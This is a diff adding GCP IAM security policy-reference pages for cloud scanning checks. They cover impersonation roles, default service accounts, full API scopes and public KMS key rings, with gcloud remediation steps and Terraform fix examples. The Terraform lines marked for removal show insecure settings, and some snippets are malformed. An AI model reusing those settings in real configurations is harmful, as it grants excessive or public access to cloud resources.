set-service-account INSTANCE_NAME - +-serviceaccount=SERVICE_ACCOUNT +---- + +. 
Restart the instance: +---- +gcloud compute instances start INSTANCE_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* service_account +* *Arguments:* email = <email other than the default service_account's> + + +[source,go] +---- +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" ++ service_account { + scopes = ["userinfo-email", "compute-ro", "storage-ro"] +- email = "[PROJECT_NUMBER]-compute@developer.gserviceaccount.com" ++ email = "example@email.com" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc new file mode 100644 index 000000000..c532cb7bd --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc @@ -0,0 +1,99 @@ +== GCP IAM primitive roles are in use + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d700141-3d41-4bf3-8a7a-89684fb8b066 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py[CKV_GCP_49] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP project through IAM inheritance from a higher resource, i.e., project binding. + +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the project level. 
+The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. + +The following list includes our current recommendations for dangerous roles, however, it is not exhaustive as permissions and roles change frequently. + +*Primitive Roles*: + +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google managed service account they are associated with. 
+ +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member, google_project_iam_binding +* *Arguments:* role + + +[source,text] +---- +resource "google_project_iam_member" "example" { + project = "project/1234567" +- role = "roles/owner" # or any other dangerous role listed above + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_project_iam_binding" "example" { + project = "project/1234567" +- role = "roles/owner" # or any other dangerous role listed above + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc new file mode 100644 index 000000000..88450ced6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc @@ -0,0 +1,125 @@ +== GCP VM instance using a default service account with full access to all Cloud APIs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e4e6196-4922-4efd-acb9-7a4afc1c379a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py[CKV_GCP_31] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +When an instance is configured with the *Compute Engine default service account* and the scope *Allow full access to all Cloud APIs*, the IAM roles assigned to the users accessing the instance may result in privilege escalation. +For example, a user may be able to perform cloud operations and API calls that they are not required to perform. 
+Along with the ability to optionally create, manage and use user-managed custom service accounts, Google Compute Engine provides the default service account, the *Compute Engine default service account*, for instances to access necessary cloud services. +The *Project Editor* role is assigned to the *Compute Engine default service account*, giving it almost all capabilities over all cloud services, except billing. +When the *Compute Engine default service account* is assigned to an instance, it can operate in three scopes: + +. *Allow default access*: Allows only the minimum access required to run an instance (least privileges). + +. *Allow full access to all Cloud APIs*: Allows full access to all the cloud APIs/services (too much access). + +. *Set access for each API*: Allows the instance administrator to choose only those APIs that are needed to perform the specific business functionality expected of the instance. ++ +We recommend you do not assign instances to the default service account *Compute Engine default service account* with the scope *Allow full access to all Cloud APIs*. ++ +This supports the principle of least privileges and helps prevent potential privilege escalation. + +//// +=== Fix - Runtime + + +*GCP Console: To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Select the impacted VM instance. + +. If the instance is not stopped, click *Stop*. ++ +Wait for the instance to stop. + +. Click *Edit*. + +. Scroll down to the *Service Account* section. + +. Select a different service account or ensure *Allow full access to all Cloud APIs* is not selected. + +. To save your changes, click *Save*. + +. Click *START*. + + +*CLI Command* + + + +. Stop the instance: +---- +gcloud compute instances stop INSTANCE_NAME +---- + +. 
Update the instance: +---- +gcloud compute instances set-service-account INSTANCE_NAME +--service-account=SERVICE_ACCOUNT +--scopes=SCOPE1,SCOPE2,... +---- + +. Restart the instance: +---- +gcloud compute instances start INSTANCE_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* service_account +* *Arguments:* If *email* is set to the default service account, or is not specified, *scopes* should not contain the full-access API. + + +[source,go] +---- +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + service_account { +- scopes = ["https://www.googleapis.com/auth/cloud-platform"] +- email = "[PROJECT_NUMBER]-compute@developer.gserviceaccount.com" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc new file mode 100644 index 000000000..46811c96a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc @@ -0,0 +1,105 @@ +== GCP IAM users are assigned Service Account User or Service Account Token Creator roles at project level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a74559b6-54e1-41ad-9ac3-cd7f838e8c18 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py[CKV_GCP_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, instead of to an individual end-user. +The application or VM instance uses the service account to call the service's Google API so that end-users are not directly involved. 
+The service account resource has IAM policies attached to it that determine who can use the service account. +Users with IAM roles that can update the *App Engine* and *Compute Engine* instances, such as *App Engine Deployer* and *Compute Instance Admin*, can run code as the service accounts used to run these instances. + +This enables users to indirectly gain access to resources for which the service accounts have access. +Similarly, SSH access to a *Compute Engine* instance may also provide the ability to execute code as that instance/service account. +Your organization may have multiple user-managed service accounts configured for a project. +Granting the *iam.serviceAccountUser* or *iam.serviceAccountTokenCreator* roles to a user for a project gives the user access to all service accounts in the project, including service accounts created in the future. + +This can result in elevation of privileges by using service accounts and corresponding *Compute Engine* instances. +To implement least-privilege best practices, IAM users should not be assigned the *Service Account User* or *Service Account Token Creator* roles at the project level. +These roles should be assigned to a user for a specific service account, giving that user access to the service account. + +The *Service Account User* role allows a user to bind a service account to a long-running job service. +The *Service Account Token Creator* role allows a user to directly impersonate, or assert, the identity of a service account. +We recommend you assign the Service Account User (iam.serviceAccountUser) and Service Account Token Creator (iam.serviceAccountTokenCreator) roles to a user for a specific service account rather than assigning the role to a user at the project level. + +//// +=== Fix - Runtime + + +*GCP Console: To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. 
Navigate to https://console.cloud.google.com/compute/iam-admin/iam [IAM Admin]. + +. Click on the filter table text bar. ++ +Type: _Role: Service Account User_ + +. Click the *Trash* icon in front of the role *Service Account User* for every user listed as a result of the filter. + +. Click on the filter table text bar. ++ +Enter _Role: Service Account Token Creator_ + +. Click the *Trash* icon in front of the role *Service Account Token Creator* for every user listed as a result of the filter. + + +*CLI Command* + + + +. Using a text editor, remove the bindings with *roles/iam.serviceAccountUser* and *roles/iam.serviceAccountTokenCreator*. + +. Update the project's IAM policy: `gcloud projects set-iam-policy PROJECT_ID iam.json`. + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_binding, google_project_iam_member +* *Arguments:* role + + +[source,go] +---- +resource "google_project_iam_binding" "project" { + project = "your-project-id" +- role = "roles/iam.serviceAccountTokenCreator" +- role = "roles/iam.serviceAccountUser" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc new file mode 100644 index 000000000..781b68f80 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc @@ -0,0 +1,120 @@ +== GCP IAM Service account does have admin privileges + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5bf5b89b-ebc3-4d84-858d-d1c0dbc4b61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* GCP IAM Service account does have 
admin privileges* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5bf5b89b-ebc3-4d84-858d-d1c0dbc4b61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM resources, determined by the roles assigned to them. +Granting a *ServiceAccount* Admin rights gives full access to the assigned application or VM. +A service-account access holder can perform critical actions, such as deleting and updating settings, without user intervention. +We recommend you do not grant Admin privileges to a *ServiceAccount*. + +//// +=== Fix - Runtime + + +*GCP Console*: To change the policy using the GCP Console, follow these steps: + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/iam-admin/iam[IAM Admin]. + +. Navigate to *Members*. + +. Identify user-managed service accounts with roles containing *Admin*/*admin*, or roles matching *Editor* or *Owner*. + +. Click the *Trash* icon to remove the role from the member. ++ +In this case, the member is the service account. + + +*CLI Command* + + + +. Using a text editor, remove any *Role* that contains *Admin*/*admin* or matches *roles/editor* or *roles/owner*. ++ +Add a role to the bindings array that defines the group members and the role for those members. + +. 
Update the project's IAM policy: `gcloud projects set-iam-policy PROJECT_ID iam.json` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member +* *Arguments:* role + member + + +[source,go] +---- +resource "google_project_iam_member" "project" { + project = "your-project-id" +- role = "roles/owner" +- member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc new file mode 100644 index 000000000..e76325b89 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc @@ -0,0 +1,98 @@ +== Roles impersonate or manage Service Accounts used at folder level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4adc9593-2094-47a4-8810-c359d3cfd88d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py[CKV_GCP_44] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP folder through IAM inheritance from a higher resource, i.e., folder binding. + +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the folder level.
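+ +One way to follow this recommendation (the resource and user names below are illustrative, not part of this policy's examples) is to grant impersonation roles on a specific service account rather than binding them at the folder level: + +[source,text] +---- +# Illustrative sketch: scope Service Account User to one service account only +resource "google_service_account_iam_member" "scoped" { + service_account_id = google_service_account.example.name + role = "roles/iam.serviceAccountUser" + member = "user:jane@example.com" +} +---- +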
+ +The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. + +The following list includes our *current* recommendations for dangerous roles; however, it is not exhaustive, as permissions and roles change frequently. + +*Primitive Roles*: + +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google-managed service account they are associated with.
+ +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_folder_iam_member google_folder_iam_binding +* *Arguments:* role + + +[source,text] +---- +resource "google_folder_iam_member" "example" { + folder = "folders/1234567" +- role = + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_folder_iam_binding" "example" { + folder = "folders/1234567" +- role = + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc new file mode 100644 index 000000000..a8935b182 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc @@ -0,0 +1,99 @@ +== Roles impersonate or manage Service Accounts used at organizational level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ba6652a8-c848-494f-8f8d-1e8b908b667d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py[CKV_GCP_45] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. + +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP organization through IAM inheritance from a higher resource, i.e., organization binding.
+ +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the organizational level. + +The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. +The following list includes our *current* recommendations for dangerous roles; however, it is not exhaustive, as permissions and roles change frequently. + +*Primitive Roles*: + +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google-managed service account they are associated with.
+ +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_organization_iam_member google_organization_iam_binding +* *Argument:* role + + +[source,text] +---- +resource "google_organization_iam_member" "example" { + org_id = "your-org-id" +- role = + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_organization_iam_binding" "example" { + org_id = "your-org-id" +- role = + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc new file mode 100644 index 000000000..d28f9c296 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc @@ -0,0 +1,106 @@ +== Default Service Account is used at project level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c154645-4580-48e4-a136-30612b5da14f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py[CKV_GCP_46] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Default Service Account is used at project level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c154645-4580-48e4-a136-30612b5da14f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py[CKV_GCP_46] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application
or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM resources, determined by the roles assigned to them. +The use of default service accounts should be avoided; see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service accounts. + +* *Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +* *project-number-compute@developer.gserviceaccount.com* +* *Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine-based services. +* *project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member google_project_iam_binding +* *Arguments:* member + + +[source,go] +---- +resource "google_project_iam_member" "project" { + project = "project/1234567" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +} + +resource "google_project_iam_binding" "project" { + project = "project/1234567" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc new file mode 100644 index 000000000..075e43d49 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc @@ -0,0 +1,105 @@ +== Default Service Account is used at organization level + + +=== Policy Details + +[width=45%]
+[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 399fd728-52cd-42a8-8ed1-3b23b38651d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py[CKV_GCP_47] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Default Service Account is used at organization level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 399fd728-52cd-42a8-8ed1-3b23b38651d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py[CKV_GCP_47] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM resources, determined by the roles assigned to them. +The use of default service accounts should be avoided; see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service accounts. +*Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +*project-number-compute@developer.gserviceaccount.com* +*Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine-based services.
+*project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_organization_iam_member google_organization_iam_binding +* *Arguments:* member + + +[source,go] +---- +resource "google_organization_iam_member" "organization" { + org_id = "your-org-id" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +} + +resource "google_organization_iam_binding" "organization" { + org_id = "your-org-id" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc new file mode 100644 index 000000000..558b45f19 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc @@ -0,0 +1,105 @@ +== Default Service Account is used at folder level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f5f3d0db-2599-4b01-aced-b5f2a69525ec + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Default Service Account is used at folder level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f5f3d0db-2599-4b01-aced-b5f2a69525ec + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM resources, determined by the roles assigned to them. +The use of default service accounts should be avoided; see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service accounts. +*Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +*project-number-compute@developer.gserviceaccount.com* +*Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine-based services.
+*project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_folder_iam_member google_folder_iam_binding +* *Arguments:* role + member + + +[source,go] +---- +resource "google_folder_iam_member" "folder" { + folder = "folders/1234567" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +} + +resource "google_folder_iam_binding" "folder" { + folder = "folders/1234567" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc new file mode 100644 index 000000000..0ba220fdc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc @@ -0,0 +1,135 @@ +== GCP Cloud KMS Key Rings are anonymously or publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d3c19de3-1388-4d33-972e-a0b1d6a19d02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml[CKV2_GCP_8] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +Bridgecrew + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d3c19de3-1388-4d33-972e-a0b1d6a19d02 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml [CKV2_GCP_8] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== +//// + + +=== Description + + +GCP Cloud KMS key rings contain your encryption keys, and allowing anonymous or public access to a key ring grants permissions for anyone to access the cryptokeys stored inside the ring. +CryptoKeys should only be accessed by trusted parties because they are commonly used to protect sensitive data. +We recommend you ensure anonymous and public access to KMS key rings is not allowed. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/security/kms/keyrings [Key Management]. + +. On the * Key Rings* details page, select your _key ring_. + +. Click the * SHOW INFO PANEL* side bar. + +. To remove a specific role assignment, to the front of * allUsers* and * allAuthenticatedUsers*, click * Delete*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, use the following command: +---- +gcloud kms keyrings remove-iam-policy-binding KEY-RING \ +--location LOCATION \ +--member PRINCIPAL \ +--role roles/ROLE-NAME +---- +Replace * KEY-RING* with the name of the key ring. +Replace * LOCATION* with the location of the key ring. +Replace * PRINCIPAL* with either * allUsers* or * allAuthenticatedUsers*. +Replace * ROLE-NAME* with the name of the role to remove. 
+//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_key_ring_iam_member +* *Field:* member +* *Resource:* google_kms_key_ring_iam_binding +* *Field:* members + + +[source,text] +---- +//Option 1 +resource "google_kms_key_ring_iam_member" "member" { + key_ring_id = google_kms_key_ring.default.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_kms_key_ring_iam_binding" "binding" { + key_ring_id = google_kms_key_ring.default.id + role = "roles/cloudkms.cryptoKeyEncrypter" + members = [ +- "allUsers", +- "allAuthenticatedUsers" + ] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc new file mode 100644 index 000000000..83594abc5 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc @@ -0,0 +1,59 @@ +== A MySQL database instance allows anyone to connect with administrative privileges + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d2a0c2ce-19b3-4894-89d5-b01e8dd0fb5d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml[CKV2_GCP_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +We recommend you set a password for the administrative user (root by default) to prevent unauthorized access to SQL database instances.
